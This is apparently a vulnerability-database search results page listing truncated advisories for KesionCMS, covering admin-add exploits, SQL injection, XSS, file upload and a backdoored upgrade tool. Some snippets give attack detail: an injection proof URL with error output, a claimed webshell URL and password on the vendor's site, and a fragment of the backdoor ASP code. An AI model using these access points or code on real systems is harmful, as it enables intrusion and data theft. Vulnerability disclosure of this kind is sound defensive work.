49 matches found
KesionCMS X 9.5 Add Administrator
==================================================================================================================================== | Title : KesionCMS X9.5 Reinstall Add Admin Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozilla firefox 105.0.32-bit...
Kesion CMS X 2.0 Add Administrator
==================================================================================================================================== | Title : KesionCMS X2.0 Reinstall Add Admin Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozilla firefox 105.0.32-bit...
KesionCMS ASP 9.5 Add Administrator
==================================================================================================================================== | Title : KesionCMS ASP v9.5 Reinstall Add Admin Exploit | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozilla firefox 105.0.32-bit |...
KesionCMS X 1.5 Add Administrator
==================================================================================================================================== | Title : KesionCMS X1.5 Reinstall Add Admin Exploit | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozilla firefox 105.0.32-bit | |...
KesionCMS X 1.5.160902 Insecure Settings
==================================================================================================================================== | Title : KesionCMS X 1.5.160902 Insecure Settings Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozilla firefox...
Unauthorized Access Vulnerability in KesionCMS of Xiamen Kesion Software Co.
KesionCMS is a set of Xiamen Kesion Software Co., Ltd. developed a set of universal site-building products, is the CMS industry, one of the site-building solutions. An unauthorized access vulnerability exists in KesionCMS by Xiamen Techflood Software Co. An attacker can use this vulnerability to...
Arbitrary File Deletion Vulnerability in KesionCMS
KesionCMS is Xiamen Kesion Software Co., Ltd. developed a set of universal station-building system. KesionCMS has an arbitrary file deletion vulnerability that can be exploited by an attacker to delete files...
SQL injection vulnerability in the keyword parameter of KesionCMS KS.LogScore.asp page
KesionCMS intelligent website building system is a set of intelligent website building system developed by Xiamen Kesion Software Ltd. using ASP+ACCESS/MSSQL database architecture. A SQL injection vulnerability exists in the keyword parameter of KesionCMS KS.LogScore.asp page. Because the...
SQL injection vulnerability in the keyword parameter of KesionCMS KS.LogPoint.asp page
KesionCMS is Xiamen Kesion Software Co., Ltd. developed a set of universal station-building system. A SQL injection vulnerability exists in the keyword parameter of KesionCMS KS.LogPoint.asp page. Because the background page KS.LogPoint.asp does not strictly filter the parameter keyword, an...
Stored Cross-site Scripting Vulnerability in KesionCMS Frontend ChangesUrl Parameter
KesionCMS intelligent website building system is a set of intelligent website building system developed by Xiamen Kesion Software Ltd. using ASP+ACCESS/MSSQL database architecture. There is a stored cross-site scripting vulnerability in the frontend of KesionCMS, as the frontend page...
Arbitrary File Upload Vulnerability in KesionCms Latest Version X2.0.170329 Backend
KesionCMS intelligent website building system is a set of intelligent website building system developed by Xiamen Kesion Software Ltd. using ASP+ACCESS/MSSQL database architecture. KesionCms latest version X2.0.170329 there are arbitrary file upload vulnerability, the vulnerability stems from the...
KesionCMS ASP版 /item/?c-5,key-1.html SQL注入漏洞
0x01漏洞简介 KesionCMS ASP版在/item/?c-5,key-1.html存在伪静态注入漏洞。 0x02漏洞详情 很明显的一处注入;但是好像需要闭合,先提交了证明下注入 http://.../item/?c-5,key-1%27.html Microsoft JET Database Engine 错误 '80040e14' 语法错误 在查询表达式 'Verific=1 and deltf=0 And Title Like '%1'%' Order by ID Desc' 中。 /item/Index.asp,行 618 0x03修复方案 过滤。...
KesionCMS官网大马一枚
简要描述: 前辈留下的一个大马后门 详细说明: http://www.kesion.com/model/viewlist.aspx 密码:912500 截止到提交前可正常浏览 漏洞证明: http://www.kesion.com/model/viewlist.aspx 密码:912500 截止到提交前可正常浏览...
KesionCMS V2.5 /plus/ueditor/Uploader.cs 文件上传
No description provided by source...
KesionCMS multi-system reception upload vulnerability-vulnerability warning-the black bar safety net
KesionICMS smart built Station system V2. 5 KesionEshop online store system X1. 0. 1 4 1 2 0 6 KesionIMALL online store system V2. 5 KesionEdu network school training system V2. 5 Due to the above system at the front Desk are using UEditor editor //should be a secondary development caused by this...
KesionCMS多个系统通用SQL注入打包 #可注入任意用户数据 demo演示
简要描述:...
KesionCMS某处存储型跨站可打cookie
简要描述: KesionCMS某处存储型跨站,可打cookie 详细说明: 官网demo演示。这个cms的xss比较多。其他的只能弹自己,所以就不发了。http://demo.kesion.com/user/weibo.asp xss出现在微博的评论处,首先我上soganame的账号发一条微博。 然后再评论处评论插入代码: 最后注册一个新账号去评论时会弹出cookie。 如果我去每一个人发表的微博下评论下都插入该条代码,打到的cookie应该会很多。 漏洞证明: xss出现在微博的评论处,首先我上soganame的账号发一条微博。 然后再评论处评论插入代码:...
kesionV8.0升9.0工具中被修改过加入后门
简要描述: 要是用到V8.0升9.0工具就会被入侵 详细说明: 直接从官方下载来的 KesionCMS V8.0升9.0工具 。 漏洞证明: 代码inc/include.asp和index.asp最后面的代码 这代码可干的事很多吧。 " Response.End End If StrLogText=StrLogText& sender Set Lzwudi=Server.CreateObject"Scripting.FileSystemObject" Set Lenovo=Lzwudi.OpenTextFileServer.MapPath"."&""&StrLogFile,8,True,...
KesionCms页面劫持漏洞
简要描述: KesionCms页面劫持漏洞 详细说明: KesionCms网校平台,发表考试心得存在页面劫持漏洞 1.首页访问此URL:http://e.kesion.com/exam/Reviews.aspx?id=20http://e.kesion.com/ 登陆账号:tttttt 密码:tttttt 2.进入“我的试卷”,发表考试心得,成功劫持页面 详情请看页面 1.http://e.kesion.com/exam/Reviews.aspx?id=20 2.http://e.kesion.com/exam/Reviews.aspx?id=16...
社工kesionCMS新网域名管理,腾讯企业邮箱
简要描述: 话不多说,看图 详细说明: 漏洞证明:...